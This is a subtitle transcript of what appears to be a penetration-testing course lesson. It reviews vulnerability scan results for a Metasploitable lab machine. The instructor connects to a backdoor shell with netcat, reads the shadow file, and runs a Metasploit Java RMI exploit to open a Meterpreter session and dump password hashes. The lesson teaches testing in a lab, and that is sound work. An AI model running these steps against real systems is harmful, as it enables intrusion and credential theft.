1
00:00:00,360 --> 00:00:02,730
So the scan is completed in 17 minutes.

2
00:00:03,390 --> 00:00:06,720
Now, another pause here, because I disabled the Windows plugins.

3
00:00:06,960 --> 00:00:10,620
It seems as if the Windows systems don't have critical vulnerabilities.

4
00:00:10,980 --> 00:00:15,930
It's not right; especially my Windows XP has several critical vulnerabilities.

5
00:00:16,530 --> 00:00:21,900
If you didn't disable the Windows plugins, you're supposed to see some more vulnerabilities for Windows

6
00:00:21,900 --> 00:00:22,410
systems.

7
00:00:23,720 --> 00:00:27,050
Now, to see the results of the Metasploitable scan in detail,

8
00:00:27,500 --> 00:00:30,650
let's click the Metasploitable results, 206.

9
00:00:32,050 --> 00:00:40,180
The scan found 10 critical vulnerabilities with our scan configuration, but please note that the configuration

10
00:00:40,210 --> 00:00:45,970
affects the results, so the target systems may have more vulnerabilities than reported.

11
00:00:47,770 --> 00:00:54,040
If there is a vulnerability and it's not found in the scan, we call it a false negative.

12
00:00:55,290 --> 00:01:01,370
I'm sure you know that the critical vulnerabilities are the most dangerous ones, but that's where it

13
00:01:01,370 --> 00:01:02,010
gets good.

14
00:01:02,030 --> 00:01:04,400
They are the most exploitable ones in general.

15
00:01:05,180 --> 00:01:11,210
So let's click on one of these critical vulnerabilities, for example, Bind Shell Backdoor Detection.

16
00:01:12,640 --> 00:01:18,250
Well, look at the description. It says a shell is listening on the port without any authentication

17
00:01:18,250 --> 00:01:19,060
being required.

18
00:01:19,750 --> 00:01:21,880
This is obviously a backdoor.

19
00:01:23,050 --> 00:01:25,090
Here's a port number of 1524.

20
00:01:25,540 --> 00:01:31,240
Now let's check if the finding is a true positive. Go to the terminal screen.
21
00:01:31,870 --> 00:01:33,970
I use the netcat tool to connect.

22
00:01:34,330 --> 00:01:36,130
Simply type nc

23
00:01:36,130 --> 00:01:40,990
and the target IP and the target port, 1524, and we're in.

24
00:01:42,400 --> 00:01:44,230
We have the shell for Metasploitable.

25
00:01:45,640 --> 00:01:50,950
Type whoami to learn the credential we have; we are the user.

26
00:01:51,490 --> 00:01:53,520
Now, it was too simple.

27
00:01:53,530 --> 00:01:56,590
It's just not fun and, you know, I don't like it.

28
00:01:56,590 --> 00:01:57,940
I like a good challenge, right?

29
00:01:58,360 --> 00:02:02,980
I mean, we are the root user and we can access anything we want.

30
00:02:02,980 --> 00:02:07,360
For example, the shadow file, which contains the hashes of the users' passwords.

31
00:02:14,570 --> 00:02:21,800
OK, back to the browser, and click on the Back to Vulnerabilities link to return to the vulnerabilities

32
00:02:21,800 --> 00:02:22,430
of Metasploitable.

33
00:02:23,750 --> 00:02:25,370
Now I'd like to show you some more.

34
00:02:26,720 --> 00:02:27,770
Scroll on down.

35
00:02:28,010 --> 00:02:34,790
The vulnerability list shows 50 vulnerabilities per page by default, but let's make it 200 to see all

36
00:02:34,790 --> 00:02:36,320
the findings in a single page.

37
00:02:37,980 --> 00:02:40,650
Now, the findings are ordered by severity levels.

38
00:02:41,010 --> 00:02:43,320
So Information is at the bottom.

39
00:02:44,290 --> 00:02:50,560
Findings with a severity level of Information identify non-vulnerability information, which is, you

40
00:02:50,560 --> 00:02:55,270
know, nice to know, and it keeps it separate from the vulnerability detail.

41
00:02:57,100 --> 00:03:00,790
So here there's an info RMI Registry Detection.

42
00:03:01,420 --> 00:03:01,990
Let's click it.
43
00:03:02,910 --> 00:03:08,670
It says that the remote host is running an RMI registry, retrieving remote objects in the Java Remote

44
00:03:08,670 --> 00:03:10,290
Method Invocation system.

45
00:03:11,370 --> 00:03:14,260
So let's look for the exploits of the Metasploit Framework,

46
00:03:14,280 --> 00:03:17,250
if there is any exploit for Java RMI.

47
00:03:38,740 --> 00:03:42,160
Opening the terminal screen and running msfconsole.

48
00:03:50,020 --> 00:03:55,180
So here we have msfconsole. Let's search the exploits for RMI.

49
00:04:09,150 --> 00:04:10,170
Too many results.

50
00:04:11,750 --> 00:04:13,070
To keep it more specific,

51
00:04:13,340 --> 00:04:15,650
I want to search "java rmi".

52
00:04:22,340 --> 00:04:26,060
So we have two auxiliaries and two exploits at this time.

53
00:04:26,810 --> 00:04:29,520
So look at the exploit in the last line.

54
00:04:30,200 --> 00:04:37,100
This module takes advantage of the default configuration of the RMI Registry and RMI Activation Services,

55
00:04:37,520 --> 00:04:40,630
which allow loading classes from any remote URL.

56
00:04:41,860 --> 00:04:44,020
Let's try to use it on our RMI port.

57
00:04:45,310 --> 00:04:49,570
Please don't worry, I am going to explain what all of these mean.

58
00:04:49,780 --> 00:04:53,020
I just want to show you an example at the beginning.

59
00:04:53,440 --> 00:04:57,700
So bear with me. Type use and the module name with the full path.

60
00:04:58,600 --> 00:05:04,060
You can simply select the module name and click the middle button of the mouse to copy and paste it.

61
00:05:05,370 --> 00:05:10,440
Type show payloads to see the payloads that can be used with this module.

62
00:05:12,100 --> 00:05:15,070
So I want to use this payload to have a Meterpreter session.

63
00:05:15,100 --> 00:05:18,190
Again, don't worry, I'll explain what Meterpreter is soon.
64
00:05:18,470 --> 00:05:24,850
But just copy and paste the payload name. Type show options to see the parameters of the exploit and

65
00:05:24,850 --> 00:05:25,900
the payload as well.

66
00:05:27,040 --> 00:05:34,630
Set the remote host as Metasploitable, 206. The default remote port is the same as our port, one

67
00:05:34,630 --> 00:05:35,530
zero nine nine.

68
00:05:36,580 --> 00:05:44,500
SRVHOST is the local host to listen on. Set this to be our Kali's IP address.

69
00:05:45,530 --> 00:05:47,390
Let the default SRVPORT remain.

70
00:05:49,180 --> 00:05:51,280
So the other options are not required.

71
00:05:51,310 --> 00:05:52,420
I'll just leave them blank.

72
00:05:53,850 --> 00:05:59,340
Now the payload options: set the listen host to be our Kali's IP address.

73
00:05:59,340 --> 00:06:07,560
The default listen port, 4444, is good, and finally type exploit to run the exploit.

74
00:06:15,090 --> 00:06:18,180
So there, it looks like we have a Meterpreter session.

75
00:06:19,220 --> 00:06:22,610
Type sessions -l to list the active sessions.

76
00:06:23,030 --> 00:06:23,540
Be patient.

77
00:06:23,570 --> 00:06:30,470
We'll see them in detail. Type sessions -i and the session ID to interact with the session.

78
00:06:31,220 --> 00:06:32,600
And here we are.

79
00:06:32,600 --> 00:06:34,070
We're in now.

80
00:06:34,070 --> 00:06:35,810
I'm going to show you what we can do with a

81
00:06:35,810 --> 00:06:38,360
Meterpreter session in the following chapter.

82
00:06:38,690 --> 00:06:41,540
But here's a couple of Meterpreter commands.

83
00:06:42,230 --> 00:06:44,150
sysinfo to see the system information.

84
00:06:48,050 --> 00:06:50,630
hashdump to gather password hashes.
85
00:06:51,590 --> 00:06:58,520
Now, no such command for this system. Thankfully, we have an alternative for this: type run post/

86
00:06:58,520 --> 00:07:05,030
linux/gather/hashdump and hit enter, and collect the fruits of your labor.

87
00:07:06,240 --> 00:07:12,870
So as you see here, we found another way to exploit the system, even though the finding was just Information.

88
00:07:13,740 --> 00:07:17,430
So I hope you understand not to underestimate any finding.